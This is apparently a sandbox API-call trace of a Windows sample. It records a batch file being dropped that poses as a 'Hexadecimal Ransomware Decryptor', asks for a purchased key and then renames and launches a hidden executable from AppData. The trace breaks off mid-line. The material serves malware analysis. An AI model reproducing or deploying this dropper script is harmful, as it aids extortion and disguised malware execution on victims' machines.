[0120.679] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76f0, Size=0xc) returned 0x23e7798 [0120.679] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] wcslen (_String="@shift ") returned 0x7 [0120.679] wcslen (_String="/") returned 0x1 [0120.679] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7e10, Size=0x1a) returned 0x23e9758 [0120.679] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7798, Size=0xc) returned 0x23e7810 [0120.679] GetLastError () returned 0x0 [0120.680] SetLastError (dwErrCode=0x0) [0120.680] wcslen (_String="@shift /") returned 0x8 [0120.680] wcslen (_String="0") returned 0x1 [0120.680] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e9758, Size=0x1c) returned 0x23e9780 [0120.680] GetLastError () returned 0x0 [0120.680] SetLastError (dwErrCode=0x0) [0120.680] GetLastError () returned 0x0 [0120.680] SetLastError (dwErrCode=0x0) [0120.680] GetLastError () returned 0x0 [0120.680] SetLastError (dwErrCode=0x0) [0120.680] GetLastError () returned 0x0 [0120.680] SetLastError (dwErrCode=0x0) [0120.680] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x22010b0 [0120.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.680] malloc (_Size=0x22) returned 0x8c26c0 [0120.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="52DF72526B67A203B121748B4B6B4E52", lpUsedDefaultChar=0x0) returned 33 [0120.680] free (_Block=0x8c26c0) [0120.680] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.680] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e80e8 [0120.680] GetLastError () returned 0x0 [0120.680] SetLastError (dwErrCode=0x0) [0120.681] GetLastError () returned 0x0 [0120.681] SetLastError (dwErrCode=0x0) [0120.681] GetLastError () returned 0x0 [0120.681] SetLastError (dwErrCode=0x0) [0120.681] GetLastError () returned 0x0 [0120.681] SetLastError (dwErrCode=0x0) [0120.681] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0xe4) returned 0x22010b0 [0120.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.681] malloc (_Size=0x22) returned 0x8c26c0 [0120.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="52DF72526B67A203B121748B4B6B4E52", lpUsedDefaultChar=0x0) returned 33 [0120.682] free (_Block=0x8c26c0) [0120.682] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.682] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e97f0 [0120.682] GetLastError () returned 0x0 [0120.682] SetLastError (dwErrCode=0x0) [0120.682] GetLastError () returned 0x0 [0120.682] SetLastError (dwErrCode=0x0) [0120.682] GetLastError () returned 0x0 [0120.682] SetLastError (dwErrCode=0x0) [0120.682] GetLastError () returned 0x0 [0120.682] SetLastError (dwErrCode=0x0) [0120.682] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0xe4) returned 0x22010b0 [0120.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EBA7866A99CCAECAA170E46C3E4F0F2C", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.682] malloc (_Size=0x22) returned 0x8c26c0 [0120.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EBA7866A99CCAECAA170E46C3E4F0F2C", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EBA7866A99CCAECAA170E46C3E4F0F2C", lpUsedDefaultChar=0x0) returned 33 [0120.683] free (_Block=0x8c26c0) [0120.683] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.683] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9858 [0120.683] GetLastError () returned 0x0 [0120.683] SetLastError (dwErrCode=0x0) [0120.683] GetLastError () returned 0x0 [0120.683] SetLastError (dwErrCode=0x0) [0120.683] GetLastError () returned 0x0 [0120.683] SetLastError (dwErrCode=0x0) [0120.683] GetLastError () returned 0x0 [0120.683] SetLastError (dwErrCode=0x0) [0120.683] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0xe4) returned 0x22010b0 [0120.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2574A33B95A45D3C8E39AE45EE40BAA6553B965", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0120.683] malloc (_Size=0x2a) returned 0x8c26c0 [0120.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2574A33B95A45D3C8E39AE45EE40BAA6553B965", cchWideChar=41, lpMultiByteStr=0x8c26c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D2574A33B95A45D3C8E39AE45EE40BAA6553B965", lpUsedDefaultChar=0x0) returned 41 [0120.684] free (_Block=0x8c26c0) [0120.684] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.684] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e98c0 [0120.684] GetLastError () returned 0x0 [0120.684] SetLastError (dwErrCode=0x0) [0120.684] GetLastError () returned 0x0 [0120.684] SetLastError (dwErrCode=0x0) [0120.684] GetLastError () returned 0x0 [0120.684] SetLastError (dwErrCode=0x0) [0120.684] GetLastError () returned 0x0 [0120.685] SetLastError (dwErrCode=0x0) [0120.685] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0xe4) returned 0x22010b0 [0120.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="213E019B6DB058DE26B0DF27F01C148ECBBF7004", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0120.685] malloc (_Size=0x2a) returned 0x8c26c0 [0120.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="213E019B6DB058DE26B0DF27F01C148ECBBF7004", cchWideChar=41, lpMultiByteStr=0x8c26c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="213E019B6DB058DE26B0DF27F01C148ECBBF7004", lpUsedDefaultChar=0x0) returned 41 [0120.685] free (_Block=0x8c26c0) [0120.685] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.685] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9928 [0120.685] GetLastError () returned 0x0 [0120.685] SetLastError (dwErrCode=0x0) [0120.686] GetLastError () returned 0x0 [0120.686] SetLastError (dwErrCode=0x0) [0120.686] wcslen (_String="55BC48964D32FBB4CD8AB0C27DFAED8C975EF9DB") returned 0x28 [0120.686] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9990 [0120.686] FindResourceW (hModule=0x400000, lpName="55BC48964D32FBB4CD8AB0C27DFAED8C975EF9DB", lpType=0xa) returned 0x0 [0120.686] GetLastError () returned 0x716 [0120.686] SetLastError (dwErrCode=0x716) [0120.686] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9990 | out: hHeap=0x23e0000) returned 1 [0120.686] GetLastError () returned 0x0 [0120.686] SetLastError (dwErrCode=0x0) [0120.686] GetLastError () returned 0x0 [0120.686] SetLastError (dwErrCode=0x0) [0120.686] GetLastError () returned 0x0 [0120.686] SetLastError (dwErrCode=0x0) [0120.686] wcslen (_String="1DFA639AC78C5C50E13DE5B5BB0D314B3BB75167") returned 0x28 [0120.686] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9990 [0120.686] FindResourceW (hModule=0x400000, lpName="1DFA639AC78C5C50E13DE5B5BB0D314B3BB75167", lpType=0xa) returned 0x419250 [0120.686] LoadResource (hModule=0x400000, hResInfo=0x419250) returned 0x432444 [0120.686] SizeofResource (hModule=0x400000, hResInfo=0x419250) returned 0x7 [0120.686] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x7) returned 0x8907c8 [0120.686] FreeResource (hResData=0x432444) returned 0 [0120.686] RtlSizeHeap (HeapHandle=0x890000, Flags=0x0, MemoryPointer=0x8907c8) returned 0x7 [0120.687] wcslen (_String="52DF72526B67A203B121748B4B6B4E52") returned 0x20 [0120.687] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23ea0a8 [0120.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.689] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x21) returned 0x8907d8 [0120.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=-1, lpMultiByteStr=0x8907d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="52DF72526B67A203B121748B4B6B4E52", lpUsedDefaultChar=0x0) returned 33 [0120.689] RtlSizeHeap (HeapHandle=0x890000, Flags=0x0, MemoryPointer=0x8907d8) returned 0x21 [0120.689] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x418) returned 0x22010b0 [0120.689] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x418) returned 0x22014d0 [0120.689] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.689] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x1c) returned 0x22010b0 [0120.689] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22014d0 | out: hHeap=0x2200000) returned 1 [0120.689] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x1c) returned 0x22010d8 [0120.689] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907d8 | out: hHeap=0x890000) returned 1 [0120.689] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea0a8 | out: hHeap=0x23e0000) returned 1 [0120.689] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.689] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010d8 | out: hHeap=0x2200000) returned 1 [0120.690] GetLastError () returned 0x0 [0120.690] SetLastError (dwErrCode=0x0) [0120.690] GetLastError () returned 0x0 [0120.690] SetLastError (dwErrCode=0x0) [0120.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8907c8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0120.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8907c8, cbMultiByte=6, lpWideCharStr=0x23e0608, cchWideChar=7 | out: lpWideCharStr="fb.bat964D32FBB4CD8AB0C27DFAED8C975EF9DB") returned 6 [0120.690] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x16) returned 0x23e7dd0 [0120.690] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907c8 | out: hHeap=0x890000) returned 1 [0120.690] GetLastError () returned 0x0 [0120.690] SetLastError (dwErrCode=0x0) [0120.690] wcslen (_String="fb.bat") returned 0x6 [0120.690] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9990 | out: hHeap=0x23e0000) returned 1 [0120.690] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7dd0 | out: hHeap=0x23e0000) returned 1 [0120.690] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x16) returned 0x23e7db0 [0120.690] GetLastError () returned 0x0 [0120.690] SetLastError (dwErrCode=0x0) [0120.690] GetLastError () returned 0x0 [0120.691] SetLastError (dwErrCode=0x0) [0120.691] wcslen (_String="D2574A33B95A45D3C8E39AE45EE40BAA6553B965") returned 0x28 [0120.691] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9990 [0120.691] FindResourceW (hModule=0x400000, lpName="D2574A33B95A45D3C8E39AE45EE40BAA6553B965", lpType=0xa) returned 0x0 [0120.691] GetLastError () returned 0x716 [0120.691] SetLastError (dwErrCode=0x716) [0120.691] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9990 | out: hHeap=0x23e0000) returned 1 [0120.691] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xa) returned 0x23e77b0 [0120.691] GetLastError () returned 0x0 [0120.691] SetLastError (dwErrCode=0x0) [0120.691] GetLastError () returned 0x0 [0120.691] SetLastError (dwErrCode=0x0) [0120.691] wcslen (_String="213E019B6DB058DE26B0DF27F01C148ECBBF7004") returned 0x28 [0120.691] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e9990 [0120.691] FindResourceW (hModule=0x400000, lpName="213E019B6DB058DE26B0DF27F01C148ECBBF7004", lpType=0xa) returned 0x0 [0120.691] GetLastError () returned 0x716 [0120.691] SetLastError (dwErrCode=0x716) [0120.691] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9990 | out: hHeap=0x23e0000) returned 1 [0120.691] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xa) returned 0x23e77e0 [0120.691] GetLastError () returned 0x0 [0120.691] SetLastError (dwErrCode=0x0) [0120.691] GetLastError () returned 0x0 [0120.691] SetLastError (dwErrCode=0x0) [0120.691] wcslen (_String="EBA7866A99CCAECAA170E46C3E4F0F2C") returned 0x20 [0120.691] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23ea100 [0120.691] FindResourceW (hModule=0x400000, lpName="EBA7866A99CCAECAA170E46C3E4F0F2C", lpType=0xa) returned 0x419280 [0120.692] LoadResource (hModule=0x400000, hResInfo=0x419280) returned 0x432460 [0120.692] SizeofResource (hModule=0x400000, hResInfo=0x419280) returned 0x23c [0120.692] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x23c) returned 0x8907c8 [0120.692] FreeResource (hResData=0x432460) returned 0 [0120.692] RtlSizeHeap (HeapHandle=0x890000, Flags=0x0, MemoryPointer=0x8907c8) returned 0x23c [0120.692] wcslen (_String="52DF72526B67A203B121748B4B6B4E52") returned 0x20 [0120.692] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e9b28 [0120.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.692] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x21) returned 0x890a10 [0120.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="52DF72526B67A203B121748B4B6B4E52", cchWideChar=-1, lpMultiByteStr=0x890a10, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="52DF72526B67A203B121748B4B6B4E52", lpUsedDefaultChar=0x0) returned 33 [0120.692] RtlSizeHeap (HeapHandle=0x890000, Flags=0x0, MemoryPointer=0x890a10) returned 0x21 [0120.692] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x418) returned 0x22010b0 [0120.692] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x418) returned 0x22014d0 [0120.692] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.692] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x1c) returned 0x22010b0 [0120.692] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22014d0 | out: hHeap=0x2200000) returned 1 [0120.692] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x1c) returned 0x22010d8 [0120.692] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x890a10 | out: hHeap=0x890000) returned 1 [0120.692] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e9b28 | out: hHeap=0x23e0000) returned 1 [0120.692] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010b0 | out: hHeap=0x2200000) returned 1 [0120.692] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x22010d8 | out: hHeap=0x2200000) returned 1 [0120.692] GetLastError () returned 0x0 [0120.692] SetLastError (dwErrCode=0x0) [0120.692] GetLastError () returned 0x0 [0120.693] SetLastError (dwErrCode=0x0) [0120.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8907c8, cbMultiByte=571, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 571 [0120.693] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x8907c8, cbMultiByte=571, lpWideCharStr=0x23e0608, cchWideChar=572 | out: lpWideCharStr="@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n ") returned 571 [0120.693] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x480) returned 0x23ea200 [0120.693] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907c8 | out: hHeap=0x890000) returned 1 [0120.693] GetLastError () returned 0x0 [0120.693] SetLastError (dwErrCode=0x0) [0120.693] wcslen (_String="@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n") returned 0x23b [0120.693] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea100 | out: hHeap=0x23e0000) returned 1 [0120.693] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea200 | out: hHeap=0x23e0000) returned 1 [0120.693] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x480) returned 0x23ea200 [0120.693] GetLastError () returned 0x0 [0120.693] SetLastError (dwErrCode=0x0) [0120.693] GetLastError () returned 0x0 [0120.693] SetLastError (dwErrCode=0x0) [0120.693] GetLastError () returned 0x0 [0120.693] SetLastError (dwErrCode=0x0) [0120.693] GetLastError () returned 0x0 [0120.693] SetLastError (dwErrCode=0x0) [0120.693] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD8.tmp") returned 0x3d [0120.693] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23ea688 [0120.693] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2710) returned 0x8907c8 [0120.693] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD8.tmp", lpszShortPath=0x8907c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD8.tmp") returned 0x3d [0120.694] GetLastError () returned 0x0 [0120.694] SetLastError (dwErrCode=0x0) [0120.694] GetLastError () returned 0x0 [0120.694] SetLastError (dwErrCode=0x0) [0120.694] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23ea718 [0120.694] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907c8 | out: hHeap=0x890000) returned 1 [0120.694] GetLastError () returned 0x0 [0120.694] SetLastError (dwErrCode=0x0) [0120.694] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD8.tmp") returned 0x3d [0120.694] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea688 | out: hHeap=0x23e0000) returned 1 [0120.694] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea718 | out: hHeap=0x23e0000) returned 1 [0120.694] free (_Block=0x8c26c0) [0120.694] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77b0, Size=0xa) returned 0x23e7828 [0120.695] GetLastError () returned 0x0 [0120.695] SetLastError (dwErrCode=0x0) [0120.695] GetLastError () returned 0x0 [0120.695] SetLastError (dwErrCode=0x0) [0120.695] GetLastError () returned 0x0 [0120.695] SetLastError (dwErrCode=0x0) [0120.695] GetLastError () returned 0x0 [0120.695] SetLastError (dwErrCode=0x0) [0120.695] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\extd.exe") returned 0x3d [0120.695] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23ea688 [0120.695] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2710) returned 0x8907c8 [0120.695] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\extd.exe", lpszShortPath=0x8907c8, cchBuffer=0x2710 | out: lpszShortPath="") returned 0x0 [0120.695] GetLastError () returned 0x2 [0120.695] SetLastError (dwErrCode=0x2) [0120.695] GetLastError () returned 0x2 [0120.695] SetLastError (dwErrCode=0x2) [0120.695] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xa) returned 0x23e7840 [0120.695] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907c8 | out: hHeap=0x890000) returned 1 [0120.695] GetLastError () returned 0x0 [0120.695] SetLastError (dwErrCode=0x0) [0120.696] wcslen (_String="") returned 0x0 [0120.696] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23ea688 | out: hHeap=0x23e0000) returned 1 [0120.696] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7840 | out: hHeap=0x23e0000) returned 1 [0120.696] free (_Block=0x8c13c8) [0120.696] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7828, Size=0xa) returned 0x23e77b0 [0120.696] GetLastError () returned 0x0 [0120.696] SetLastError (dwErrCode=0x0) [0120.696] GetLastError () returned 0x0 [0120.696] SetLastError (dwErrCode=0x0) [0120.696] wcslen (_String="@shift /0") returned 0x9 [0120.696] wcslen (_String="\r\n") returned 0x2 [0120.696] wcslen (_String="") returned 0x0 [0120.696] wcslen (_String="@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n") returned 0x23b [0120.696] wcslen (_String="") returned 0x0 [0120.697] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 0x3d [0120.697] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23ea688 [0120.697] wcslen (_String="@shift /0\r\n@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho Recoverying Files....\r\ncd C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\r\nren MicrosoftNTSystem.sys WindowsSystemTools.exe\r\nstart WindowsSystemTools.exe\r\necho Done! File Decrypt! Please Reboot!\r\nexit\r\n\r\n") returned 0x246 [0120.697] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x496) returned 0x23ea718 [0120.697] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x28) returned 0x22010b0 [0120.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0120.701] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x1000) returned 0x22010e0 [0120.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@shift /0\r\n@echo off\r\ntitle HexadecimalDecryptor 1.0\r\necho Hexadecimal Ransomware Decryptor\r\n\r\necho Hello! %username%\r\necho Enter the decryption code you have purchased!\r\n\r\n:home\r\nset /p password=Please Enter Recovery Key!:\r\nif %password%==1079814822265 goto pass\r\n:wng\r\necho Wrong Recovery Key! Please-ReENter\r\ngoto home\r\n\r\n\r\n\r\n:pass\r\ntitle File Decrypting...\r\ncls\r\necho 